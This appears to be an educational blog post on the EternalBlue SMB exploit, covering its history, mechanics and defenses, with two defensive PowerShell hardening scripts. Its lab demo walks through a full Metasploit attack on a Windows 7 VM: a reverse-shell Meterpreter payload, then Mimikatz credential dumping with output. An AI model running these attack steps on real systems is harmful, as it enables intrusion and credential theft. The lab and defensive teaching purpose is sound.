In the realm of cybersecurity, EternalBlue stands as a stark reminder of the vulnerabilities that can exist within even the most robust systems. This exploit, developed by the National Security Agency (NSA), has been responsible for some of the most significant cyberattacks in recent history. We will get into what EternalBlue is, its origins, how it has been used, and the implications of its continued existence.

What is EternalBlue?

EternalBlue is an exploit that takes advantage of a vulnerability in Microsoft’s Server Message Block (SMB) protocol. SMB is a network file sharing protocol that allows applications and users to read and write to files and request services from server programs in a computer network. The vulnerability, known as CVE-2017-0144, exists in the way SMBv1 handles certain requests, allowing attackers to execute arbitrary code on the target machine.

The Origins of EternalBlue

The creation of EternalBlue can be traced back to the NSA, which developed it as part of its cyber arsenal. This exploit was designed to penetrate Windows systems, allowing the agency to conduct espionage and gather intelligence. However, the existence of EternalBlue was not publicly known until a group called the Shadow Brokers released a trove of NSA hacking tools in April 2017. Among these tools was EternalBlue, and its release marked the beginning of its widespread misuse.

Notable Attacks Using EternalBlue

  1. WannaCry Ransomware Attack:
    Perhaps the most infamous use of EternalBlue was in the WannaCry ransomware attack in May 2017. This attack affected hundreds of thousands of computers across 150 countries, including critical infrastructure such as hospitals, telecommunications, and transportation. WannaCry encrypted users’ files and demanded a ransom payment in Bitcoin to decrypt them. The rapid spread of WannaCry highlighted the devastating potential of EternalBlue.
  2. NotPetya Attack:
    Following WannaCry, the NotPetya attack in June 2017 also leveraged EternalBlue. NotPetya initially appeared to be ransomware but was, in fact, a wiper designed to destroy data. This attack primarily targeted Ukrainian organizations but spread globally, causing billions of dollars in damages.
  3. EternalRocks:
    Unlike the previously mentioned attacks, EternalRocks is a worm that utilizes not just EternalBlue but six other NSA exploits. Discovered in May 2017, EternalRocks demonstrated the potential for more complex and damaging attacks using the leaked NSA tools.

How EternalBlue Works

To understand how EternalBlue works, it’s important to get into the technical details of the SMB vulnerability it exploits. When EternalBlue targets a system, it sends specially crafted packets to the SMBv1 service running on the target machine. These packets exploit the buffer overflow vulnerability, allowing the attacker to execute arbitrary code. This code execution can lead to various malicious activities, such as installing ransomware or other malware, creating backdoors, or taking control of the system.

Here’s a simplified step-by-step breakdown of the EternalBlue exploitation process:

  1. Scanning: The attacker scans a network to identify computers running vulnerable versions of SMB.
  2. Payload Delivery: Once a target is identified, the attacker sends specially crafted SMB packets to exploit the buffer overflow vulnerability.
  3. Code Execution: The exploit allows the attacker to execute arbitrary code on the target machine.
  4. Post-Exploitation: After gaining control, the attacker can deploy further payloads, such as ransomware, additional malware, or use the compromised machine to launch attacks on other systems.

How to Use EternalBlue

Using EternalBlue, especially for malicious purposes, is illegal and unethical. However, understanding its mechanics is crucial for defensive purposes. Here’s how cybersecurity professionals might use EternalBlue in a controlled, ethical manner:

  1. Penetration Testing: Security experts use EternalBlue in penetration testing to identify vulnerable systems within an organization. This helps in assessing the security posture and readiness against such exploits.
  2. Training and Education: Cybersecurity training programs often include modules on EternalBlue to educate professionals about its workings and how to defend against it.
  3. Research and Development: Researchers study EternalBlue to develop better security measures, such as more effective intrusion detection systems and patch management strategies.

Defending Against EternalBlue

The most effective defense against EternalBlue is to ensure that all systems are updated with the latest security patches. Microsoft released a patch (MS17-010) in March 2017 to address the SMB vulnerability exploited by EternalBlue. Here are additional steps to bolster defenses:

  1. Disable SMBv1: Since SMBv1 is an outdated protocol with known vulnerabilities, it should be disabled if not required.
  2. Network Segmentation: Implementing network segmentation can prevent the spread of malware within an organization.
  3. Intrusion Detection Systems (IDS): Deploying IDS can help detect and respond to suspicious activities associated with EternalBlue.
  4. Regular Security Audits: Conducting regular security audits ensures that vulnerabilities are identified and mitigated promptly.
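
The following PowerShell script is an added example, not part of the original post, that puts the first two recommendations into practice on the Windows 7 / Server 2008 R2 family used later in the demo: it checks whether the MS17-010 update is installed, reports the SMBv1 server state, and disables SMBv1 on both the server and client side using Microsoft's documented registry value and service changes. The KB numbers (KB4012212 security-only update, KB4012215 monthly rollup) and registry paths are Microsoft's published values for this OS family; the function names and output text are my own. Run it from an elevated prompt.

```powershell
# Added example: audit and harden a Windows 7 / Server 2008 R2 host against MS17-010.
# Run elevated. Function names and messages are assumptions; KB numbers and paths are Microsoft's.

# The security-only update and the monthly rollup that carried MS17-010 for this OS family.
# Later cumulative rollups supersede both, so a miss means "verify manually", not "vulnerable".
$Ms17010Kbs = @('KB4012212', 'KB4012215')

function Test-Ms17010Patch {
    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    $found = $Ms17010Kbs | Where-Object { $installed -contains $_ }
    if ($found) {
        Write-Output "MS17-010 fix present: $($found -join ', ')"
        return $true
    }
    Write-Output "Neither $($Ms17010Kbs -join ' nor ') found; check for a later rollup before assuming unpatched"
    return $false
}

$LanmanServerParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1ServerState {
    # An absent SMB1 value means the protocol is enabled, which is the default on this OS family.
    $value = (Get-ItemProperty -Path $LanmanServerParams -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $value -or $value -ne 0) { return 'enabled' }
    return 'disabled'
}

function Disable-Smb1 {
    # Server side: tell srv.sys to stop serving SMBv1 (this is the component EternalBlue targets).
    Set-ItemProperty -Path $LanmanServerParams -Name SMB1 -Type DWord -Value 0 -Force
    # Client side: remove the SMBv1 redirector (mrxsmb10) from the workstation service dependencies
    # and stop it from loading at boot.
    sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi | Out-Null
    sc.exe config mrxsmb10 start= disabled | Out-Null
    Write-Output 'SMBv1 disabled on server and client side; reboot for the change to take full effect'
}

# Audit first, change second.
$patched = Test-Ms17010Patch
Write-Output "SMBv1 server state: $(Get-Smb1ServerState)"
if ((Get-Smb1ServerState) -eq 'enabled') { Disable-Smb1 }
if (-not $patched) {
    Write-Output 'Apply the MS17-010 update as well; disabling SMBv1 only removes the EternalBlue entry point'
}
```

Disabling SMBv1 and patching are complementary: the registry change stops srv.sys from answering SMBv1 at all, while the update fixes the kernel code path, so a host that still needs SMBv1 for a legacy device is protected only by the patch. Expect SMBv1-only clients (old printers, NAS firmware) to lose access after the change, which is why the script reports before it modifies anything.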

Demo Time

Disclaimer: For this demonstration, I am using a Windows 7 machine running on VirtualBox, which is specifically vulnerable and configured for this demo in a closed network environment. Do not attempt this on unauthorized machines.

Searchsploit is a command-line tool that allows you to search the Exploit Database (Exploit-DB) for known vulnerabilities and exploits. It is part of Offensive Security’s Exploit Database project, a comprehensive archive of public exploits and the corresponding vulnerable software. The tool is extremely useful for penetration testers and security researchers who need to quickly identify potential exploits for known vulnerabilities. For more information, visit the Exploit-DB website. Here, we use searchsploit to find the available EternalBlue exploits:

    ┌──(kali㉿kali)-[~]
    └─$ searchsploit eternalblue
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
     Exploit Title                                                                                                                                                                |  Path
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
    Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                              | windows/remote/42031.py
    Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                          | windows/remote/42315.py
    Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                    | windows_x86-64/remote/42030.py
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
    Shellcodes: No Results
    

Launch Metasploit Framework – Metasploit is a popular penetration testing framework that provides tools and resources for discovering, exploiting, and validating vulnerabilities. msfconsole is the command-line interface for Metasploit.

    ┌──(kali㉿kali)-[~]
    └─$ msfconsole              
    
    Metasploit tip: Enable HTTP request and response logging with set HttpTrace 
    true
                                                      
    # cowsay++
     ____________
    < metasploit >
     ------------
           \   ,__,
            \  (oo)____
               (__)    )\
                  ||--|| *
    
    
           =[ metasploit v6.4.15-dev                          ]
    + -- --=[ 2420 exploits - 1248 auxiliary - 423 post       ]
    + -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
    + -- --=[ 9 evasion                                       ]
    
    Metasploit Documentation: https://docs.metasploit.com/

Search for EternalBlue Modules in Metasploit – This command searches Metasploit for modules related to EternalBlue. The list includes exploits, auxiliary modules, and post-exploitation modules associated with the vulnerability.

    msf6 > search eternalblue
    
    Matching Modules
    ================
    
       #   Name                                           Disclosure Date  Rank     Check  Description
       -   ----                                           ---------------  ----     -----  -----------
       0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       1     \_ target: Automatic Target                  .                .        .      .
       2     \_ target: Windows 7                         .                .        .      .
       3     \_ target: Windows Embedded Standard 7       .                .        .      .
       4     \_ target: Windows Server 2008 R2            .                .        .      .
       5     \_ target: Windows 8                         .                .        .      .
       6     \_ target: Windows 8.1                       .                .        .      .
       7     \_ target: Windows Server 2012               .                .        .      .
       8     \_ target: Windows 10 Pro                    .                .        .      .
       9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
       10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
       11    \_ target: Automatic                         .                .        .      .
       12    \_ target: PowerShell                        .                .        .      .
       13    \_ target: Native upload                     .                .        .      .
       14    \_ target: MOF upload                        .                .        .      .
       15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
       16    \_ AKA: ETERNALROMANCE                       .                .        .      .
       17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
       18    \_ AKA: ETERNALBLUE                          .                .        .      .
       19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
       21    \_ AKA: ETERNALROMANCE                       .                .        .      .
       22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
       23    \_ AKA: ETERNALBLUE                          .                .        .      .
       24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
       25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
       26    \_ AKA: ETERNALBLUE                          .                .        .      .
       27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
       28    \_ target: Execute payload (x64)             .                .        .      .
       29    \_ target: Neutralize implant                .                .        .      .
    
    
    Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
    After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

Use the EternalBlue Exploit Module – This command selects the EternalBlue exploit module in Metasploit. The info command provides detailed information about the module, including supported targets, options, and references.

    msf6 > use exploit/windows/smb/ms17_010_eternalblue
    [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/ms17_010_eternalblue) > info
    
           Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
         Module: exploit/windows/smb/ms17_010_eternalblue
       Platform: Windows
           Arch: x64
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Average
      Disclosed: 2017-03-14
    
    Provided by:
      Equation Group
      Shadow Brokers
      sleepya
      Sean Dillon <[email protected]m>
      Dylan Davis <[email protected]m>
      thelightcosine
      wvu <[email protected]m>
      agalway-r7
      cdelafuente-r7
      cdelafuente-r7
      agalway-r7
    
    Available targets:
          Id  Name
          --  ----
      =>  0   Automatic Target
          1   Windows 7
          2   Windows Embedded Standard 7
          3   Windows Server 2008 R2
          4   Windows 8
          5   Windows 8.1
          6   Windows Server 2012
          7   Windows 10 Pro
          8   Windows 10 Enterprise Evaluation
    
    Check supported:
      Yes
    
    Basic options:
      Name           Current Setting  Required  Description
      ----           ---------------  --------  -----------
      RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
      RPORT          445              yes       The target port (TCP)
      SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
      SMBPass                         no        (Optional) The password for the specified username
      SMBUser                         no        (Optional) The username to authenticate as
      VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
      VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
    
    Payload information:
      Space: 2000
    
    Description:
      This module is a port of the Equation Group ETERNALBLUE exploit, part of
      the FuzzBunch toolkit released by Shadow Brokers.
    
      There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
      is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
      DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
      is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
      completed in srvnet!SrvNetWskReceiveComplete.
    
      This exploit, like the original may not trigger 100% of the time, and should be
      run continuously until triggered. It seems like the pool will get hot streaks
      and need a cool down period before the shells rain in again.
    
      The module will attempt to use Anonymous login, by default, to authenticate to perform the
      exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use
      those instead.
    
      On some systems, this module may cause system instability and crashes, such as a BSOD or
      a reboot. This may be more likely with some payloads.
    
    References:
      https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
      https://nvd.nist.gov/vuln/detail/CVE-2017-0143
      https://nvd.nist.gov/vuln/detail/CVE-2017-0144
      https://nvd.nist.gov/vuln/detail/CVE-2017-0145
      https://nvd.nist.gov/vuln/detail/CVE-2017-0146
      https://nvd.nist.gov/vuln/detail/CVE-2017-0147
      https://nvd.nist.gov/vuln/detail/CVE-2017-0148
      https://github.com/RiskSense-Ops/MS17-010
      https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
      https://www.exploit-db.com/exploits/42030
    
    Also known as:
      ETERNALBLUE
    
    
    View the full module info with the info -d command.
    

Show and Configure the Exploit Options – The show options command displays the configurable parameters for the selected exploit module. Key options include:

• RHOSTS: Specifies the target IP address. This is a required setting.
• RPORT: The port on which the SMB service is running, defaulting to 445.
• SMBDomain, SMBPass, SMBUser: Optional settings for authentication.
• VERIFY_ARCH and VERIFY_TARGET: Ensure the exploit targets the correct architecture and operating system version.

    msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
    
    Module options (exploit/windows/smb/ms17_010_eternalblue):
    
       Name           Current Setting  Required  Description
       ----           ---------------  --------  -----------
       RHOSTS         10.10.1.124      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
       RPORT          445              yes       The target port (TCP)
       SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
       SMBPass                         no        (Optional) The password for the specified username
       SMBUser                         no        (Optional) The username to authenticate as
       VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
       VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
    
    
    Payload options (windows/x64/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     10.10.1.4        yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Target
    
    
    
    View the full module info with the info, or info -d command.
    

Set the Target Host – RHOST specifies the target IP address. In this step, we set it to the address of the machine we want to exploit.

    msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 10.10.1.124
    RHOST => 10.10.1.124

Run the Exploit – Running the exploit command initiates the attack. If successful, it opens a Meterpreter session, providing control over the target machine.

    msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
    
    [*] Started reverse TCP handler on 10.10.1.4:4444 
    [*] 10.10.1.124:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] 10.10.1.124:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
    [*] 10.10.1.124:445       - Scanned 1 of 1 hosts (100% complete)
    [+] 10.10.1.124:445 - The target is vulnerable.
    [*] 10.10.1.124:445 - Connecting to target for exploitation.
    [+] 10.10.1.124:445 - Connection established for exploitation.
    [+] 10.10.1.124:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 10.10.1.124:445 - CORE raw buffer dump (40 bytes)
    [*] 10.10.1.124:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
    [*] 10.10.1.124:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
    [*] 10.10.1.124:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
    [+] 10.10.1.124:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 10.10.1.124:445 - Trying exploit with 12 Groom Allocations.
    [*] 10.10.1.124:445 - Sending all but last fragment of exploit packet
    [*] 10.10.1.124:445 - Starting non-paged pool grooming
    [+] 10.10.1.124:445 - Sending SMBv2 buffers
    [+] 10.10.1.124:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 10.10.1.124:445 - Sending final SMBv2 buffers.
    [*] 10.10.1.124:445 - Sending last fragment of exploit packet!
    [*] 10.10.1.124:445 - Receiving response from exploit packet
    [+] 10.10.1.124:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 10.10.1.124:445 - Sending egg to corrupted connection.
    [*] 10.10.1.124:445 - Triggering free of corrupted buffer.
    [*] Sending stage (201798 bytes) to 10.10.1.124
    [*] Meterpreter session 1 opened (10.10.1.4:4444 -> 10.10.1.124:49159) at 2024-07-05 19:47:15 -0400
    [+] 10.10.1.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.1.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.1.124:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
    meterpreter >

Post-Exploitation – Load Mimikatz to extract credentials. Mimikatz is a tool used to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. In Metasploit, kiwi is the extension that integrates Mimikatz’s functionality.

    meterpreter > load kiwi
    Loading extension kiwi...
      .#####.   mimikatz 2.2.0 20191125 (x64/windows)
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'        Vincent LE TOUX            ( [email protected] )
      '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
    
    Success.

Retrieve All Credentials – The creds_all command extracts all available credentials from the target, providing a comprehensive view of the compromised system’s security.

    meterpreter > creds_all
    [+] Running as SYSTEM
    [*] Retrieving all credentials
    msv credentials
    ===============
    
    Username  Domain    LM                                NTLM                              SHA1
    --------  ------    --                                ----                              ----
    vboxuser  WINDOWS7  df5359a8e9ddd9a1944e2df489a880e4  fcfac73da7b7c9e8815c744a3ec5646b  7b3aba54f3da8ab99414fa1288043a1c26be57f7
    
    wdigest credentials
    ===================
    
    Username   Domain     Password
    --------   ------     --------
    (null)     (null)     (null)
    WINDOWS7$  WORKGROUP  (null)
    vboxuser   WINDOWS7   vboxuser
    
    tspkg credentials
    =================
    
    Username  Domain    Password
    --------  ------    --------
    vboxuser  WINDOWS7  vboxuser
    
    kerberos credentials
    ====================
    
    Username   Domain     Password
    --------   ------     --------
    (null)     (null)     (null)
    vboxuser   WINDOWS7   vboxuser
    windows7$  WORKGROUP  (null)
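
The wdigest and tspkg tables above show the account’s password in plaintext, which is possible because the WDigest security provider keeps a reversible copy of logon credentials in LSASS memory. The following PowerShell script is an added example, not part of the original post, that checks and disables that caching through the UseLogonCredential value Microsoft introduced for this purpose; on Windows 7 / Server 2008 R2 the value is only honoured once KB2871997 is installed. The registry path and value are Microsoft’s; the function names and messages are my own. Run it from an elevated prompt.

```powershell
# Added example: stop LSASS from caching reversible WDigest credentials, which is what
# let creds_all print a plaintext password. Run elevated. On Windows 7 / 2008 R2 this
# requires KB2871997; the function names and messages are assumptions.

$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Get-WDigestCachingState {
    $value = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    # No value at all means caching is on: that is the Windows 7 / 2008 R2 default even with KB2871997 installed.
    if ($null -eq $value) { return 'enabled (default)' }
    if ($value -eq 0) { return 'disabled' }
    return 'enabled'
}

function Test-WDigestFixPresent {
    # Without KB2871997 the UseLogonCredential value is ignored on this OS family.
    return [bool](Get-HotFix -Id KB2871997 -ErrorAction SilentlyContinue)
}

function Disable-WDigestCaching {
    New-ItemProperty -Path $WDigestKey -Name UseLogonCredential -PropertyType DWord -Value 0 -Force | Out-Null
    # Secrets already held for existing logon sessions are not purged; the setting applies to
    # logons that happen after the change, so reboot or have users log off and on again.
    Write-Output 'UseLogonCredential set to 0; re-logon or reboot for it to take effect'
}

Write-Output "WDigest credential caching: $(Get-WDigestCachingState)"
if (-not (Test-WDigestFixPresent)) {
    Write-Output 'KB2871997 not found; install it first or the setting below has no effect on this OS'
}
if ((Get-WDigestCachingState) -ne 'disabled') { Disable-WDigestCaching }
```

This does not stop a SYSTEM-level attacker from reading the NTLM hash shown in the msv table, so it narrows what a memory dump yields rather than preventing it; the point is that the plaintext password, which is reusable against any service, is no longer sitting in LSASS. Newer Windows versions disable WDigest caching by default, and an attacker re-enabling this value is itself a useful detection signal for registry-change monitoring.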

Conclusion

EternalBlue is a potent reminder of the ongoing cat-and-mouse game between cybersecurity professionals and malicious actors. While it has been the source of significant disruption and damage, it has also driven advancements in cybersecurity practices and defenses. By understanding EternalBlue and taking proactive measures, organizations can better protect themselves against similar threats in the future.
